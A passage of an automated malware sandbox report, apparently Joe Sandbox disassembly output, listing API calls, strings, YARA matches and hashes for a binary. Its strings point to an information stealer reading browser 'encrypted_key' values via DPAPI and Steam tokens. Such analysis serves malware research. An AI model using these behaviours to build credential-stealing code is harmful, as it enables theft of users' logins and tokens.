                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00E472C3
                                • HeapFree.KERNEL32(00000000), ref: 00E472CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00E47329
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: 28aa707d3dc56004fb68513a66cdc1c5582d61cc92365435cf52f5666de828cd
                                • Instruction ID: ace106a1bb270c331c3bf671520eca7acf3990237211d045370d0adbcfb7e6e5
                                • Opcode Fuzzy Hash: 28aa707d3dc56004fb68513a66cdc1c5582d61cc92365435cf52f5666de828cd
                                • Instruction Fuzzy Hash: A9415D71B056069BDB20CF69E884BAAB3E8FB84319F144569ED8DE7310E775E9009B90
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00E49CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E49CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E49D03
                                Strings
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: 17e1f7dff4650e3df427e1412678bf0896f1bff6d7b2d6e3fcb355d6a755803f
                                • Instruction ID: 37226eccd243dc54ff3279ef1e7d09505e5a470f9f7659f35db1d1428776b172
                                • Opcode Fuzzy Hash: 17e1f7dff4650e3df427e1412678bf0896f1bff6d7b2d6e3fcb355d6a755803f
                                • Instruction Fuzzy Hash: A0415C71E002099BDB21EF64F8856AFB7F4AF94358F446568FE25BB253DA30AD04C790
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5EA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5EA53
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5EA61
                                • lstrcat.KERNEL32(?,00E71794), ref: 00E5EA7A
                                • lstrcat.KERNEL32(?,016C8978), ref: 00E5EA8D
                                • lstrcat.KERNEL32(?,00E71794), ref: 00E5EA9F
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 70493ae90ad83093360c1b188eef83fdf3d039db59945002b0cc07804335bd6a
                                • Instruction ID: efdafff6a1e988f0df60967b5b0d16d296b50d90dbcbeed1f37cebbf99e9cf9a
                                • Opcode Fuzzy Hash: 70493ae90ad83093360c1b188eef83fdf3d039db59945002b0cc07804335bd6a
                                • Instruction Fuzzy Hash: FB41A571D10118AFCB25EB64EC46EED33B4BF48300F4054A9BA5AB7345DA749E448BA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5ECDF
                                • lstrlen.KERNEL32(00000000), ref: 00E5ECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5ED1D
                                • lstrlen.KERNEL32(00000000), ref: 00E5ED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00E5ED52
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: d46eab4c9542ac57e595c9edbaf3dbd5fdc3d2e868afa59cdc9dccc3d17cd2dc
                                • Instruction ID: 68552d85a8d983ad65357295c6f7758c3d26bac3bc2a32146b661d9c3207400a
                                • Opcode Fuzzy Hash: d46eab4c9542ac57e595c9edbaf3dbd5fdc3d2e868afa59cdc9dccc3d17cd2dc
                                • Instruction Fuzzy Hash: 68317A31A102446BC722BF78F84A96E7BE8AF44315F446428FE46FB302DB24DD0987E1
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00E4140E), ref: 00E49A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00E4140E), ref: 00E49AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,00E4140E), ref: 00E49AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,00E4140E,00000000,?,?,?,00E4140E), ref: 00E49AE0
                                • LocalFree.KERNEL32(?,?,?,?,00E4140E), ref: 00E49B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,00E4140E), ref: 00E49B07
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: fee702d4b85282460d91b0163908cbd84f73b31db8840b6de7e308aee36c0288
                                • Instruction ID: 8c32083a94cbd84f054055feaf992f3a1a100e568e81e3594f887c4ce542914e
                                • Opcode Fuzzy Hash: fee702d4b85282460d91b0163908cbd84f73b31db8840b6de7e308aee36c0288
                                • Instruction Fuzzy Hash: 0E115E71A00209AFE721DEA8EC88EAB737CEB04358F104259F905B6285EB759D10CBA5
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E65B14
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A188
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00E65B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 00E65B89
                                • memmove.MSVCRT(00000000,?,?), ref: 00E65B98
                                Strings
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: 5fc6b6d9b100ec07d5b33425d22dfd0600843dcce5f78b8ab8faa2b0baf25205
                                • Instruction ID: 73c6dd89adccca089f58519110c9e5d2468be902659b4ad544527972e7ffeaeb
                                • Opcode Fuzzy Hash: 5fc6b6d9b100ec07d5b33425d22dfd0600843dcce5f78b8ab8faa2b0baf25205
                                • Instruction Fuzzy Hash: 3F415F72B406199FCF18DF6CD995AAEBBF5EB88350F148229E919E7384D630DD01CB90
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E57D58
                                  • Part of subcall function 00E6A1C0: std::exception::exception.LIBCMT ref: 00E6A1D5
                                  • Part of subcall function 00E6A1C0: std::exception::exception.LIBCMT ref: 00E6A1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E57D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E57D91
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: 10c4f10dcfd2ef54cd0d448cfd0739fa2758e1ff777019c0256085f68fd33645
                                • Instruction ID: 4bbe22712cd444e0276124ac95daab830f83b2d4b12f4d3c70fc274838b5fdf3
                                • Opcode Fuzzy Hash: 10c4f10dcfd2ef54cd0d448cfd0739fa2758e1ff777019c0256085f68fd33645
                                • Instruction Fuzzy Hash: 6021D2323043004BD7209E6CF881A3AF7E5EF92755B245E6EE886AB281D771DC1887A1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E633EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E633F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 00E63411
                                • wsprintfA.USER32 ref: 00E63437
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: 18fd72d821c827dc8bc52625088f02074eefacfac7fd6252c9f8fd397a92d0c7
                                • Instruction ID: d97a1e34a393e2bd86edf5b6134db27c3cbf98dc77e88de04d87bdfcf7f9ba4b
                                • Opcode Fuzzy Hash: 18fd72d821c827dc8bc52625088f02074eefacfac7fd6252c9f8fd397a92d0c7
                                • Instruction Fuzzy Hash: 6001B5B1E44218AFDB24DFA8DD49BAEB7B8FB44760F004129FA16F7380D779590087A1
                                Similarity
                                • API ID: __amsg_exit$__getptdfree
                                • String ID: Xu$Xu
                                • API String ID: 2640026729-2934775391
                                • Opcode ID: 8430d1b692ab58eac5c6a94ceb39a7ab1fa9893e3be864b1c3b21fd007015453
                                • Instruction ID: 4212b2fc3f4f24e130987c19d0d86270345120130b22cc1ededee17e69d59b4c
                                • Opcode Fuzzy Hash: 8430d1b692ab58eac5c6a94ceb39a7ab1fa9893e3be864b1c3b21fd007015453
                                • Instruction Fuzzy Hash: B801D632DC6721ABDB14EB29B40579E73E47F00798F153019E448776A2CB306D81DBD5
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,016CDD90,00000000,00020119,?), ref: 00E5D7F5
                                • RegQueryValueExA.ADVAPI32(?,016CED50,00000000,00000000,00000000,000000FF), ref: 00E5D819
                                • RegCloseKey.ADVAPI32(?), ref: 00E5D823
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5D848
                                • lstrcat.KERNEL32(?,016CEDB0), ref: 00E5D85C
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 5e536baa3c0a2b73edc9c5cf9d0bf37f327c61c1d77e503d315be38262ddf30e
                                • Instruction ID: 8453fd4acd4450f51ad497177b9dff5b3489c833169f7e694185d3b13337c498
                                • Opcode Fuzzy Hash: 5e536baa3c0a2b73edc9c5cf9d0bf37f327c61c1d77e503d315be38262ddf30e
                                • Instruction Fuzzy Hash: 48417271A1010C9FCB64EF64FC86FDE77B8AB44304F409065BA49B7241EA35AA89CFD1
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00E57F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E57F60
                                • StrCmpCA.SHLWAPI(00000000,00E74C3C), ref: 00E57FA5
                                • StrCmpCA.SHLWAPI(00000000,00E74C3C), ref: 00E57FD3
                                • StrCmpCA.SHLWAPI(00000000,00E74C3C), ref: 00E58007
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 19d6db8f8f4580078332a5f3f88cb67919a8c1bab27b90c92aff182504b3fa4f
                                • Instruction ID: ba575343b8d02286b7a15c8e2cb888eb198f1ae66ced68193c2b8769b01ccebd
                                • Opcode Fuzzy Hash: 19d6db8f8f4580078332a5f3f88cb67919a8c1bab27b90c92aff182504b3fa4f
                                • Instruction Fuzzy Hash: 8F41C030A0810ADFCB20DF68E480E9EB7B4FF54305B115599E846FB341DB31AA69CBA1
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00E580BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E580EA
                                • StrCmpCA.SHLWAPI(00000000,00E74C3C), ref: 00E58102
                                • lstrlen.KERNEL32(00000000), ref: 00E58140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5816F
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: d6e0dc11f64dff47196e4a5b43f75aceeef7cea5d5100992a79ec4dfc218b1fa
                                • Instruction ID: 5e52ba62b85aef0a7dbeeb92379b04d45383c95f6b6d17f3955ca4504dcb0805
                                • Opcode Fuzzy Hash: d6e0dc11f64dff47196e4a5b43f75aceeef7cea5d5100992a79ec4dfc218b1fa
                                • Instruction Fuzzy Hash: 3E418D71600106ABDB21DF68DA48BAABBF4EF44315F10981DAD8AF7244EB34DD49CB90
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00E61B72
                                  • Part of subcall function 00E61820: lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E6184F
                                  • Part of subcall function 00E61820: lstrlen.KERNEL32(016B6EF0), ref: 00E61860
                                  • Part of subcall function 00E61820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E61887
                                  • Part of subcall function 00E61820: lstrcat.KERNEL32(00000000,00000000), ref: 00E61892
                                  • Part of subcall function 00E61820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E618C1
                                  • Part of subcall function 00E61820: lstrlen.KERNEL32(00E74FA0), ref: 00E618D3
                                  • Part of subcall function 00E61820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E618F4
                                  • Part of subcall function 00E61820: lstrcat.KERNEL32(00000000,00E74FA0), ref: 00E61900
                                  • Part of subcall function 00E61820: lstrcpy.KERNEL32(00000000,00000000), ref: 00E6192F
                                • sscanf.NTDLL ref: 00E61B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E61BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E61BC6
                                • ExitProcess.KERNEL32 ref: 00E61BE3
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: 51f870bd70efaaa95c6158eaf2753df579ad995f319b5a111e54485eaf4f9502
                                • Instruction ID: af8ec26382063b8af2d030520dbd5ee6541ca9a4fe96395443403d06a00ddca8
                                • Opcode Fuzzy Hash: 51f870bd70efaaa95c6158eaf2753df579ad995f319b5a111e54485eaf4f9502
                                • Instruction Fuzzy Hash: CB21E2B1918301AF8351DF69D88485FBBF8EEC8354F409A1EF5A9D3214E734D5088BA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E63166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E6316D
                                • RegOpenKeyExA.ADVAPI32(80000002,016BB9B8,00000000,00020119,?), ref: 00E6318C
                                • RegQueryValueExA.ADVAPI32(?,016CDDD0,00000000,00000000,00000000,000000FF), ref: 00E631A7
                                • RegCloseKey.ADVAPI32(?), ref: 00E631B1
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: be5a3f2848b8473f492e9b9836f3a52e5b08b24240b02b18eedffd33aa3fb5e7
                                • Instruction ID: a56d412f32f229a2ff011fb79ee4025f101a7037d4e10f85d4910dae780a88f2
                                • Opcode Fuzzy Hash: be5a3f2848b8473f492e9b9836f3a52e5b08b24240b02b18eedffd33aa3fb5e7
                                • Instruction Fuzzy Hash: 3A114276A40209AFD720CF94E949FABB7BCE744725F00412AFA05F3684D77559008BA1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 6942eb7f1c6667d975e55ba28e05be37776c58ee6508ad18087b7ae1d0819b67
                                • Instruction ID: 30c8a12fc4987570eea80c34f284605fc98b04e16fc578493ddf2abeb9f9f942
                                • Opcode Fuzzy Hash: 6942eb7f1c6667d975e55ba28e05be37776c58ee6508ad18087b7ae1d0819b67
                                • Instruction Fuzzy Hash: 2141397054075CAEDB318B24EC98FFB7BFC9B45388F1454E8E996A6183E2719A45CF20
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E48996
                                  • Part of subcall function 00E6A1C0: std::exception::exception.LIBCMT ref: 00E6A1D5
                                  • Part of subcall function 00E6A1C0: std::exception::exception.LIBCMT ref: 00E6A1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E489CD
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A188
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: d8eaa3cdd79348623bd05ad0592344911777de56b402cc50fb7d61273b155c9c
                                • Instruction ID: a65515ecff7970d61c1bc7e1d037390561d7512a5f688a4c7c960695889e4acc
                                • Opcode Fuzzy Hash: d8eaa3cdd79348623bd05ad0592344911777de56b402cc50fb7d61273b155c9c
                                • Instruction Fuzzy Hash: D421F6723006504BC7219A6CF940A6EF7D9DBA17A4F15293FF245EB281CBB1DC41C3A5
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E48883
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A188
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 4408b2c37d2463a67f933b9a4a2a0db40572ec1286a1767eb3ff5e6c1bdc1f53
                                • Instruction ID: ef094a7c103519d863bf3d933e49cbb81284c1e54d02fc842a828ba6d9013985
                                • Opcode Fuzzy Hash: 4408b2c37d2463a67f933b9a4a2a0db40572ec1286a1767eb3ff5e6c1bdc1f53
                                • Instruction Fuzzy Hash: 1B31B7B5E005159FCB08DF58D9906ADBBB6EB88350F188269E915AB384DB30AD01CB91
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E65922
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A188
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E65935
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: 4be051bdee8dfb29400cbabef4b7a0aa4bf6d28cd9141f1d5ec627d52682cca9
                                • Instruction ID: df60e8a95cf5176c7dc1c9069d2f2e5a838945cb25ecfec002df9d2f8f01142e
                                • Opcode Fuzzy Hash: 4be051bdee8dfb29400cbabef4b7a0aa4bf6d28cd9141f1d5ec627d52682cca9
                                • Instruction Fuzzy Hash: 16118232344B40CBC7328B2CF800719BBE1EBD67A0F251A6DE0E1A7695C761D841C7A1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00E6A430,000000FF), ref: 00E63D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E63D27
                                • wsprintfA.USER32 ref: 00E63D37
                                  • Part of subcall function 00E671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E671FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 6308470fc62b907472cb191b7c075aaf41c6a307ed3052bca793b998d0f77260
                                • Instruction ID: a849c37a7e9b66829bb988a6c28edbfcd2e312fa9c0423610918c8eff581667e
                                • Opcode Fuzzy Hash: 6308470fc62b907472cb191b7c075aaf41c6a307ed3052bca793b998d0f77260
                                • Instruction Fuzzy Hash: 0201AD71A80304BFE7215B54AC0AF6ABB78FB45B65F004115FA15B72C0D6BA1900CBE1
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E48737
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A188
                                  • Part of subcall function 00E6A173: std::exception::exception.LIBCMT ref: 00E6A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
